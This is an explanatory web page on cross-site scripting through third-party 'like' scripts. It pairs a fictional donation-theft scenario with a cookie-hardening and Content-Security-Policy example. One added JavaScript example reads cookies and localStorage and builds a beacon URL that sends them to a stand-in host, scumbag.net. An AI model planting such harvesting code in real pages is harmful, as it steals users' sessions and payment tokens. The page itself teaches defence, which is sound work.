In short, Cross-Site Scripting (XSS) is what happens when a script that someone else controls runs inside a page served by your site. The browser treats that script as your own, so it can read and manipulate anything your pages can: cookies, web storage, forms, the whole page. The usual route is an attacker injecting script into a page, but a script you deliberately load from another server has exactly the same power, and that is the case this page is about.
A web site, TLC.org.za (a worthy orphanage in South Africa), wants to be better known, so it puts a chatter.com "like" button on its pages.
Dave, a true philanthropist, makes a donation using moneyFriend.com, then clicks the chatter "like" button to let his friends know about this worthy cause.
chatter.com runs a script that has Dave "like" and "follow" TLC.org.za, and then tells all of Dave's chatter friends about it.
Good for Dave, good for TLC.org.za, good for chatter.com, everybody's happy.
That holds as long as chatter.com is highly moral and ethical and is never hacked. (Have any companies like chatter.com ever been breached? Here's a list of breaches at Facebook, and here's a list of breaches at Twitter.)
When the chatter.com script runs, it runs as part of TLC.org.za's page, because TLC.org.za loaded it with a script tag. That gives it the same access as TLC.org.za's own scripts: the cookies exposed through document.cookie (any cookie not marked HttpOnly), localStorage and sessionStorage, and everything on the page, including form fields.
So if chatter.com is not highly moral and ethical, or if it has been hacked, it can "steal" whatever TLC.org.za keeps there, including Dave's moneyFriend.com connection.
Suppose chatter.com was recently hacked by scumBag.net, and a malicious script was added to the like function. When Dave clicked "like", his moneyFriend.com details were sent to scumBag.net, and scumBag.net has just sent $1000 of Dave's hard-earned cash to a bank account in Mauritius.
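What such a script can take from the page, as an added example that is not part of the original page: it reads document.cookie and web storage exactly as the site's own script would and ships the result in a URL it can load as an image. The document and storage are passed in as parameters so the code also runs outside a browser; the collector host, cookie names and storage keys are constructed for the illustration.

```javascript
// Added example: what a third-party "like" script can read once a site has included it
// with <script src="https://chatter.com/like.js">. The browser runs it as part of the
// including page, so document.cookie, localStorage and the DOM are all in reach.
// The collector host, cookie names and storage keys below are made up for the illustration.

// Parse a document.cookie string ("a=1; b=2") into an object.
// Cookies set with HttpOnly are never part of this string, so they cannot be harvested this way.
function parseCookieString(cookieString) {
  const out = {};
  for (const part of cookieString.split(";")) {
    const eq = part.indexOf("=");
    if (eq === -1) continue;
    const name = part.slice(0, eq).trim();
    if (name) out[name] = decodeURIComponent(part.slice(eq + 1).trim());
  }
  return out;
}

// Everything an included script can take from the page. `doc` and `storage` are passed in
// so the function can run outside a browser; in a real page they are `document` and `localStorage`.
function harvestPage(doc, storage) {
  const cookies = parseCookieString(doc.cookie);
  const stored = {};
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    stored[key] = storage.getItem(key);
  }
  return { page: doc.location ? doc.location.href : "", cookies, storage: stored };
}

// Exfiltration needs no special permission: the data rides in a URL, which the script
// can load as an image (new Image().src = url) or fetch() in no-cors mode.
function buildBeaconUrl(collectorOrigin, harvested) {
  const payload = btoa(JSON.stringify(harvested));
  return collectorOrigin + "/c?d=" + encodeURIComponent(payload);
}

// Constructed stand-in for the TLC.org.za page as the browser would present it to the script.
const fakeDocument = {
  location: { href: "https://tlc.org.za/donate/thanks" },
  // these cookies are readable; a cookie flagged HttpOnly would simply be absent here
  cookie: "session=d41d8cd9; donor=Dave%20P; lang=en",
};
const fakeStorage = (() => {
  // constructed: a payment token the donation page left in localStorage
  const m = new Map([["moneyFriendToken", "mf_live_7f3a9c"], ["lastAmount", "1000"]]);
  return { length: m.size, key: (i) => [...m.keys()][i], getItem: (k) => m.get(k) ?? null };
})();

// The whole attack in one call: harvest, then build the beacon URL to the collector.
function demo() {
  return buildBeaconUrl("https://scumbag.net", harvestPage(fakeDocument, fakeStorage));
}
```

The point to take from the fake document is the cookie that is not there: a cookie marked HttpOnly never appears in document.cookie, so it never reaches the script. Web storage has no such flag, which is why the token in localStorage is lost.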
The above scenario is purely fictitious, although things like that happen many times every day.
TLC.org.za is a real orphanage in South Africa that does wonderful things every day, with very little money.
But how does a site like 3rdKey.com prevent this kind of thing from happening?
Any site that understands this problem, including 3rdKey.com, configures its cookies so that scripts cannot read them: the session cookie is marked HttpOnly (so no script in the page, ours or anyone else's, can read it), Secure (sent only over HTTPS) and SameSite (not attached to requests that start from another site).
But cookie flags protect only cookies, not web storage or what is on the page, so additionally we do not trust any other site: we will not put a script from any other site on any of our pages, ever. That is why you do not find a "like" button on our pages.
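Both defences as the response headers a server would send, with a small audit of them. This is an added example, not 3rdKey.com's own code; the cookie name, lifetime and origins are assumed for the illustration.

```javascript
// Added example (not 3rdKey.com's own code): the two defences described above as HTTP
// response headers. Cookie flags keep the session cookie out of document.cookie and off
// cross-site requests; a Content-Security-Policy whose script-src names no third-party host
// turns "no script from any other site" into something the browser enforces.
// Cookie name, lifetime and origins are illustrative.

// Build a Set-Cookie header for a session cookie with the hardening attributes.
//  HttpOnly: no script in the page, ours or an included one, can read it via document.cookie
//  Secure:   only sent over HTTPS
//  SameSite=Strict: not attached to requests that start from another site (the CSRF case in the FAQ)
function buildSessionCookie(name, value, maxAgeSeconds) {
  return [
    `${name}=${encodeURIComponent(value)}`,
    `Max-Age=${maxAgeSeconds}`,
    "Path=/",
    "HttpOnly",
    "Secure",
    "SameSite=Strict",
  ].join("; ");
}

// Parse a Set-Cookie header into its name=value part and an attribute map.
// Attribute names are case-insensitive, so they are lowercased here.
function parseSetCookie(header) {
  const [nameValue, ...attrs] = header.split(";").map((s) => s.trim());
  const attributes = {};
  for (const a of attrs) {
    const eq = a.indexOf("=");
    const key = (eq === -1 ? a : a.slice(0, eq)).toLowerCase();
    attributes[key] = eq === -1 ? true : a.slice(eq + 1);
  }
  return { nameValue, attributes };
}

// Report which hardening attributes a session cookie is missing; empty array means none.
function auditSetCookie(header) {
  const { attributes } = parseSetCookie(header);
  const missing = [];
  if (!attributes.httponly) missing.push("HttpOnly");
  if (!attributes.secure) missing.push("Secure");
  const sameSite = typeof attributes.samesite === "string" ? attributes.samesite.toLowerCase() : "";
  if (sameSite !== "strict" && sameSite !== "lax") missing.push("SameSite=Strict or Lax");
  return missing;
}

// A policy that allows script only from the page's own origin. Adding "https://chatter.com"
// to script-src is exactly the decision the text above refuses to make.
function buildCsp() {
  return ["default-src 'self'", "script-src 'self'", "object-src 'none'", "base-uri 'self'"].join("; ");
}

// Would this policy let a script served from `scriptOrigin` run on a page from `pageOrigin`?
// Handles only the 'self' and host-origin source forms used here, enough to show the check.
function cspAllowsScript(csp, pageOrigin, scriptOrigin) {
  const directives = Object.fromEntries(
    csp.split(";").map((d) => d.trim().split(/\s+/)).map(([name, ...src]) => [name, src])
  );
  const sources = directives["script-src"] || directives["default-src"] || [];
  return sources.some((s) => (s === "'self'" ? scriptOrigin === pageOrigin : s === scriptOrigin));
}
```

Run auditSetCookie() over the Set-Cookie headers any site hands back and the gaps show up immediately; a cookie of the form "session=abc; Path=/" is missing all three flags. Note what the flags do not cover: anything kept in web storage stays readable by every script in the page, which is why the policy, not the cookie flags, is what actually keeps a chatter.com script out.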
FAQs
Cross-Site Request Forgery (CSRF) can be confused with Cross-Site Scripting: the effect is about the same, but the method is quite different.
In XSS the scumBag.net script has stolen Dave's log-in by reading goodSite.com's cookies; in CSRF scumBag.net "guesses" that Dave is logged in to goodSite.com and, from its own page, makes Dave's browser send goodSite.com instructions, to which the browser attaches Dave's goodSite.com cookies.